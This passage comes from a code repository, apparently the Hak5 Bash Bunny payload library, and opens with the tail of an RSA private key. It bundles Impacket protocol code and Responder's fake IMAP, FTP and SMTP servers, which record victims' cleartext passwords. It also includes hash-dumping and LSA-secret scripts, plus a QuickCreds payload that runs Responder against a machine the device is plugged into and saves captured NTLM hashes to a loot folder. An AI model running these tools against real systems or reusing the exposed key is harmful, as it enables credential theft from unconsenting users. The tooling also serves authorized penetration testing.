kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U 10 | YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R 11 | FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i 12 | erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ 13 | IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS 14 | nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL 15 | LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9 16 | cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1 17 | 5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf 18 | s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje 19 | ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2 20 | VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes 21 | AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35 22 | HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf 23 | VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm 24 | kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35 25 | f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp 26 | MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/Dot11KeyManager.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # IEEE 802.11 Network packet codecs. 
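#
# Author:
#  Gustavo Moreira

from array import array


class KeyManager:
    """Dictionary-style store of keys indexed by BSSID.

    A BSSID may be passed as a list, tuple or ``array``; it is normalised
    to a tuple so that it can serve as a ``dict`` key (lists and arrays are
    unhashable). Any other type raises ``Exception``.
    """

    def __init__(self):
        # tuple(bssid) -> key
        self.keys = {}

    def __get_bssid_hasheable_type(self, bssid):
        """Validate ``bssid`` and return it as a hashable tuple.

        Raises ``Exception`` when ``bssid`` is not a list, tuple or array.
        """
        if not isinstance(bssid, (list, tuple, array)):
            raise Exception('BSSID datatype must be a tuple, list or array')
        return tuple(bssid)

    def add_key(self, bssid, key):
        """Store ``key`` under ``bssid`` only if no key is present yet.

        Returns True when stored, False when a key already existed (the
        existing key is kept; use ``replace_key`` to overwrite it).
        """
        bssid = self.__get_bssid_hasheable_type(bssid)
        if bssid in self.keys:
            return False
        self.keys[bssid] = key
        return True

    def replace_key(self, bssid, key):
        """Store ``key`` under ``bssid``, overwriting any existing key.

        Always returns True.
        """
        bssid = self.__get_bssid_hasheable_type(bssid)
        self.keys[bssid] = key
        return True

    def get_key(self, bssid):
        """Return the key stored under ``bssid``, or False when there is none."""
        bssid = self.__get_bssid_hasheable_type(bssid)
        return self.keys.get(bssid, False)

    def delete_key(self, bssid):
        """Remove the key stored under ``bssid``.

        Returns True when a key was removed, False when none was stored.
        """
        # Type validation happens in __get_bssid_hasheable_type, which returns
        # a tuple; re-checking ``isinstance(bssid, list)`` afterwards would
        # fail for every input and make this method unusable.
        bssid = self.__get_bssid_hasheable_type(bssid)
        if bssid in self.keys:
            del self.keys[bssid]
            return True
        return False
-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/setup.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# $Id$

import glob
import os

from distutils.core import setup

PACKAGE_NAME = "impacket"

setup(name = PACKAGE_NAME,
      version = "0.9.16-dev",
      description = "Network protocols Constructors and Dissectors",
      url = "https://www.coresecurity.com/corelabs-research/open-source-tools/impacket",
      author = "Core Security Technologies",
      author_email = "oss@coresecurity.com",
      maintainer = "Alberto Solino",
      maintainer_email = "bethus@gmail.com",
      license = "Apache modified",
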
long_description = 'Impacket is a collection of Python classes focused on providing access to network packets. Impacket allows Python developers to craft and decode network packets in simple and consistent manner.', 21 | platforms = ["Unix","Windows"], 22 | packages = ['impacket', 'impacket.dcerpc', 'impacket.examples', 'impacket.dcerpc.v5', 'impacket.dcerpc.v5.dcom', 'impacket.krb5', 'impacket.ldap', 'impacket.examples.ntlmrelayx', 'impacket.examples.ntlmrelayx.clients', 'impacket.examples.ntlmrelayx.servers', 'impacket.examples.ntlmrelayx.utils'], 23 | scripts = glob.glob(os.path.join('examples', '*.py')), 24 | data_files = [(os.path.join('share', 'doc', PACKAGE_NAME), ['README.md', 'LICENSE']+glob.glob('doc/*')), 25 | (os.path.join('share', 'doc', PACKAGE_NAME, 'testcases', 'dot11'),glob.glob('impacket/testcases/dot11/*')), 26 | (os.path.join('share', 'doc', PACKAGE_NAME, 'testcases', 'ImpactPacket'),glob.glob('impacket/testcases/ImpactPacket/*')), 27 | (os.path.join('share', 'doc', PACKAGE_NAME, 'testcases', 'SMB_RPC'),glob.glob('impacket/testcases/SMB_RPC/*'))], 28 | requires=['pycrypto (>=2.6)', 'pyasn1 (>=0.1.8)'], 29 | ) 30 | -------------------------------------------------------------------------------- /payloads/library/bunny_helpers.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ################################################################################ 4 | # Get target ip address and hostname from dhcp lease. 5 | # This is for the attack mode of ETHERNET specified. 6 | # Without ETHERNET specified, below environment variables will be empty. 7 | # 8 | # How this works? 9 | # 1) ATTACKMODE waits until: 10 | # a) target ip address is negotiated by dhcp 11 | # b) time out 12 | # 2) After ATTACKMODE, we can get target ip address and hostname. 
13 | ################################################################################ 14 | leasefile="/var/lib/dhcp/dhcpd.leases" 15 | export TARGET_IP=$(cat $leasefile | grep ^lease | awk '{ print $2 }' | sort | uniq) 16 | export TARGET_HOSTNAME=$(cat $leasefile | grep hostname | awk '{print $2 }' \ 17 | | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') 18 | export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) 19 | 20 | ################################################################################ 21 | # Get switch position 22 | # Taken from bash_bunny.sh 23 | ################################################################################ 24 | 25 | check_switch() { 26 | switch1=`cat /sys/class/gpio_sw/PA8/data` 27 | switch2=`cat /sys/class/gpio_sw/PL4/data` 28 | switch3=`cat /sys/class/gpio_sw/PL3/data` 29 | echo "--- switch1 = $switch1, switch2 = $switch2, switch3 = $switch3" 30 | if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then 31 | SWITCH_POSITION="switch1" 32 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then 33 | SWITCH_POSITION="switch2" 34 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then 35 | SWITCH_POSITION="switch3" 36 | else 37 | SWITCH_POSITION="invalid" 38 | fi 39 | } 40 | 41 | check_switch 42 | export SWITCH_POSITION -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information.
8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for helper used to build ProtocolPackets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | # sorry, this is very ugly, but I'm in python 2.5 18 | import sys 19 | sys.path.insert(0,"../../..") 20 | 21 | 22 | import unittest 23 | import impacket.helper as h 24 | 25 | 26 | 27 | class TestHelpers(unittest.TestCase): 28 | 29 | def test_well_formed(self): 30 | class MockPacket(h.ProtocolPacket): 31 | byte_field = h.Byte(0) 32 | word_field = h.Word(1, ">") 33 | three_bytes_field = h.ThreeBytesBigEndian(3) 34 | long_field = h.Long(6, ">") 35 | aliased_bit_field = h.Bit(0,0) 36 | 37 | header_size = 4 38 | tail_size = 0 39 | 40 | p = MockPacket() 41 | p.byte_field = 1 42 | p.word_field = 2 43 | p.three_bytes_field = 4 44 | p.long_field = 8 45 | 46 | self.assertEqual(1, p.byte_field) 47 | self.assertEqual(2, p.word_field) 48 | self.assertEqual(4, p.three_bytes_field) 49 | self.assertEqual(8, p.long_field) 50 | 51 | self.assertEqual(True, p.aliased_bit_field) 52 | 53 | p.aliased_bit_field = False 54 | 55 | self.assertEqual(0, p.byte_field) 56 | 57 | self.assertEqual(p.get_packet(), MockPacket(p.get_packet()).get_packet()) # it is the same packet after reprocessing. 58 | 59 | 60 | suite = unittest.TestLoader().loadTestsFromTestCase(TestHelpers) 61 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/IMAP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 
4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd 20 | 21 | class IMAP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(IMAPGreeting())) 25 | data = self.request.recv(1024) 26 | 27 | if data[5:15] == "CAPABILITY": 28 | RequestTag = data[0:4] 29 | self.request.send(str(IMAPCapability())) 30 | self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag))) 31 | data = self.request.recv(1024) 32 | 33 | if data[5:10] == "LOGIN": 34 | Credentials = data[10:].strip() 35 | 36 | SaveToDb({ 37 | 'module': 'IMAP', 38 | 'type': 'Cleartext', 39 | 'client': self.client_address[0], 40 | 'user': Credentials[0], 41 | 'cleartext': Credentials[1], 42 | 'fullhash': Credentials[0]+":"+Credentials[1], 43 | }) 44 | 45 | ## FIXME: Close connection properly 46 | ## self.request.send(str(ditchthisconnection())) 47 | ## data = self.request.recv(1024) 48 | except Exception: 49 | pass 50 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/lsadump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file 
is part of creddump. 4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.lsasecrets import get_file_secrets 26 | 27 | # Hex dump code from 28 | # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812 29 | 30 | FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) 31 | 32 | def dump(src, length=8): 33 | N=0; result='' 34 | while src: 35 | s,src = src[:length],src[length:] 36 | hexa = ' '.join(["%02X"%ord(x) for x in s]) 37 | s = s.translate(FILTER) 38 | result += "%04X %-*s %s\n" % (N, length*3, hexa, s) 39 | N+=length 40 | return result 41 | 42 | if len(sys.argv) < 3: 43 | print "usage: %s Bootkey " % sys.argv[0] 44 | sys.exit(1) 45 | 46 | secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2]) 47 | if not secrets: 48 | print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" 
49 | sys.exit(1) 50 | 51 | for k in secrets: 52 | print k 53 | print dump(secrets[k], length=16) 54 | 55 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/FTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 
17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import FTPPacket 20 | 21 | class FTP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(FTPPacket())) 25 | data = self.request.recv(1024) 26 | 27 | if data[0:4] == "USER": 28 | User = data[5:].strip() 29 | 30 | Packet = FTPPacket(Code="331",Message="User name okay, need password.") 31 | self.request.send(str(Packet)) 32 | data = self.request.recv(1024) 33 | 34 | if data[0:4] == "PASS": 35 | Pass = data[5:].strip() 36 | 37 | Packet = FTPPacket(Code="530",Message="User not logged in.") 38 | self.request.send(str(Packet)) 39 | data = self.request.recv(1024) 40 | 41 | SaveToDb({ 42 | 'module': 'FTP', 43 | 'type': 'Cleartext', 44 | 'client': self.client_address[0], 45 | 'user': User, 46 | 'cleartext': Pass, 47 | 'fullhash': User + ':' + Pass 48 | }) 49 | 50 | else: 51 | Packet = FTPPacket(Code="502",Message="Command not implemented.") 52 | self.request.send(str(Packet)) 53 | data = self.request.recv(1024) 54 | 55 | except Exception: 56 | pass 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/DumpHash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import sqlite3 18 | 19 | def DumpHashToFile(outfile, data): 20 | with open(outfile,"w") as dump: 21 | dump.write(data) 22 | 23 | def DbConnect(): 24 | cursor = sqlite3.connect("./Responder.db") 25 | return cursor 26 | 27 | def GetResponderCompleteNTLMv2Hash(cursor): 28 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 29 | Output = "" 30 | for row in res.fetchall(): 31 | Output += '{0}'.format(row[0])+'\n' 32 | return Output 33 | 34 | def GetResponderCompleteNTLMv1Hash(cursor): 35 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 36 | Output = "" 37 | for row in res.fetchall(): 38 | Output += '{0}'.format(row[0])+'\n' 39 | return Output 40 | 41 | cursor = DbConnect() 42 | print "Dumping NTLMV2 hashes:" 43 | v2 = GetResponderCompleteNTLMv2Hash(cursor) 44 | DumpHashToFile("DumpNTLMv2.txt", v2) 45 | print v2 46 | print "\nDumping NTLMv1 hashes:" 47 | v1 = GetResponderCompleteNTLMv1Hash(cursor) 48 | DumpHashToFile("DumpNTLMv1.txt", v1) 49 | print v1 50 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameACK 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame ACK 15 | 
self.frame_orig='\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT) 27 | 28 | self.ack = Dot11ControlFrameACK(d.get_body_as_string()) 29 | 30 | d.contains(self.ack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.ack.get_header_size(), 8) 35 | self.assertEqual(self.ack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.ack.get_duration(), 0) 41 | self.ack.set_duration(0x1234) 42 | self.assertEqual(self.ack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.ack.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.ack.set_ra(ra) 52 | self.assertEqual(self.ack.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlACK) 55 | unittest.TextTestRunner(verbosity=2).run(suite) 56 | 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | 
# 802.11 Control Frame CTS 15 | self.frame_orig='\xc4\x00\x3b\x12\x00\x19\xe0\x98\x04\xd4\x2b\x8a\x65\x17' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND) 27 | 28 | self.cts = Dot11ControlFrameCTS(d.get_body_as_string()) 29 | 30 | d.contains(self.cts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cts.get_header_size(), 8) 35 | self.assertEqual(self.cts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cts.get_duration(), 4667) 41 | self.cts.set_duration(0x1234) 42 | self.assertEqual(self.cts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cts.get_ra() 48 | 49 | self.assertEqual(ra.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4]) 50 | ra[0]=0x12 51 | ra[5]=0x34 52 | self.cts.set_ra(ra) 53 | self.assertEqual(self.cts.get_ra().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34]) 54 | 55 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCTS) 56 | unittest.TextTestRunner(verbosity=2).run(suite) 57 | 58 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/test_nmb.py: -------------------------------------------------------------------------------- 1 | import ConfigParser 2 | import unittest 3 | 4 | from impacket import nmb 5 | 6 | 7 | class NMBTests(unittest.TestCase): 8 | def create_connection(self): 9 | pass 10 | 11 | def test_getnetbiosname(self): 12 | n = nmb.NetBIOS() 13 | res = n.getnetbiosname(self.machine) 14 | print repr(res) 15 | 
self.assertTrue( self.serverName, res) 16 | 17 | def test_getnodestatus(self): 18 | n = nmb.NetBIOS() 19 | resp = n.getnodestatus(self.serverName.upper(), self.machine) 20 | print resp 21 | 22 | def test_gethostbyname(self): 23 | n = nmb.NetBIOS() 24 | n.set_nameserver(self.serverName) 25 | resp = n.gethostbyname(self.serverName, nmb.TYPE_SERVER) 26 | print resp.entries 27 | 28 | def test_name_registration_request(self): 29 | n = nmb.NetBIOS() 30 | # ToDo: Look at this 31 | #resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1') 32 | resp = n.name_registration_request('*JSMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_ONT_P, '1.1.1.2') 33 | resp.dump() 34 | 35 | def test_name_query_request(self): 36 | n = nmb.NetBIOS() 37 | # ToDo: Look at this 38 | # resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1') 39 | resp = n.name_query_request(self.serverName, self.machine) 40 | print resp.entries 41 | 42 | class NetBIOSTests(NMBTests): 43 | def setUp(self): 44 | NMBTests.setUp(self) 45 | # Put specific configuration for target machine with SMB1 46 | configFile = ConfigParser.ConfigParser() 47 | configFile.read('dcetests.cfg') 48 | self.serverName = configFile.get('SMBTransport', 'servername') 49 | self.machine = configFile.get('SMBTransport', 'machine') 50 | 51 | if __name__ == "__main__": 52 | suite = unittest.TestLoader().loadTestsFromTestCase(NetBIOSTests) 53 | unittest.TextTestRunner(verbosity=1).run(suite) 54 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/SMTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 
4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from base64 import b64decode 19 | from SocketServer import BaseRequestHandler 20 | from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2 21 | 22 | class ESMTP(BaseRequestHandler): 23 | 24 | def handle(self): 25 | try: 26 | self.request.send(str(SMTPGreeting())) 27 | data = self.request.recv(1024) 28 | 29 | if data[0:4] == "EHLO": 30 | self.request.send(str(SMTPAUTH())) 31 | data = self.request.recv(1024) 32 | 33 | if data[0:4] == "AUTH": 34 | self.request.send(str(SMTPAUTH1())) 35 | data = self.request.recv(1024) 36 | 37 | if data: 38 | try: 39 | User = filter(None, b64decode(data).split('\x00')) 40 | Username = User[0] 41 | Password = User[1] 42 | except: 43 | Username = b64decode(data) 44 | 45 | self.request.send(str(SMTPAUTH2())) 46 | data = self.request.recv(1024) 47 | 48 | if data: 49 | try: Password = b64decode(data) 50 | except: Password = data 51 | 52 | SaveToDb({ 53 | 'module': 'SMTP', 54 | 'type': 'Cleartext', 55 | 'client': self.client_address[0], 56 | 'user': Username, 57 | 'cleartext': Password, 58 | 'fullhash': Username+":"+Password, 59 | }) 60 | 61 | except Exception: 62 | pass 63 | -------------------------------------------------------------------------------- /payloads/library/QuickCreds/payload.txt: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Quick Creds 4 | # Author: Hak5Darren -- Cred: Mubix 5 | # Version: 1.0 6 | # 7 | # Runs responder against target with specified options 8 | # Saves sequential logs to mass storage loot folder 9 | # 10 | # Requires responder in /pentest/responder - run tools_installer payload first 11 | # 12 | # White Blinking.....Dependencies not met. Responder not installed in /pentest 13 | # Red ...............Setup 14 | # Red Blinking.......Setup Failed. Target did not obtain IP address. Exit. 15 | # Amber Blinking.....Scanning 16 | # Green..............Finished 17 | # 18 | # Options 19 | RESPONDER_OPTIONS="-w -r -d -P" 20 | LOOTDIR=/root/udisk/loot/quickcreds 21 | 22 | # Check for responder. If not found, blink WHITE and end. 23 | if [ ! -d /pentest/responder/ ]; then 24 | LED R G B 100 25 | exit 1 26 | fi 27 | 28 | # Set LED Red while setting up attack 29 | LED R 30 | 31 | # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET 32 | ATTACKMODE RNDIS_ETHERNET 33 | #ATTACKMODE ECM_ETHERNET 34 | 35 | # Source bunny_helpers.sh for functions & variables TARGET_IP, TARGET_HOSTNAME 36 | source bunny_helpers.sh 37 | 38 | # Setup named logs in loot directory 39 | mkdir -p $LOOTDIR 40 | HOST=${TARGET_HOSTNAME} 41 | # If hostname is blank set it to "noname" 42 | [[ -z "$HOST" ]] && HOST="noname" 43 | COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) 44 | COUNT=$((COUNT+1)) 45 | mkdir -p $LOOTDIR/$HOST-$COUNT 46 | 47 | # As a backup also copy logs to a loot directory in /root/loot/ 48 | mkdir -p /root/loot/quickcreds/$HOST-$COUNT 49 | 50 | # Check target IP address. If unset, blink RED and end. 
51 | if [ -z "${TARGET_IP}" ]; then 52 | LED R 100 53 | exit 1 54 | fi 55 | 56 | # Set LED yellow, run attack 57 | LED G R 500 58 | cd /pentest/responder 59 | 60 | # Clean logs directory 61 | rm logs/* 62 | 63 | # Run Responder with specified options 64 | python Responder.py -I usb0 $RESPONDER_OPTIONS & 65 | 66 | # Wait until NTLM log is found 67 | until [ -f logs/*NTLM* ] 68 | do 69 | # Ima just loop here until NTLM logs are found 70 | sleep 1 71 | done 72 | 73 | # copy logs to loot directory 74 | cp logs/* /root/loot/quickcreds/$HOST-$COUNT 75 | cp logs/* $LOOTDIR/$HOST-$COUNT 76 | 77 | # Sync USB disk filesystem 78 | sync 79 | 80 | # Light turns green - trap is clean. 81 | LED G -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/opdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """opdump - scan for operations on a given DCERPC interface 3 | 4 | Usage: opdump.py hostname port interface version 5 | 6 | This binds to the given hostname:port and DCERPC interface. Then, it tries to 7 | call each of the first 256 operation numbers in turn and reports the outcome 8 | of each call. 9 | 10 | This will generate a burst of TCP connections to the given host:port! 11 | 12 | Example: 13 | $ ./opdump.py 10.0.0.30 135 99FCFEC4-5260-101B-BBCB-00AA0021347A 0.0 14 | op 0 (0x00): rpc_x_bad_stub_data 15 | op 1 (0x01): rpc_x_bad_stub_data 16 | op 2 (0x02): rpc_x_bad_stub_data 17 | op 3 (0x03): success 18 | op 4 (0x04): rpc_x_bad_stub_data 19 | ops 5-255: nca_s_op_rng_error 20 | 21 | rpc_x_bad_stub_data, rpc_s_access_denied, and success generally means there's an 22 | operation at that number. 
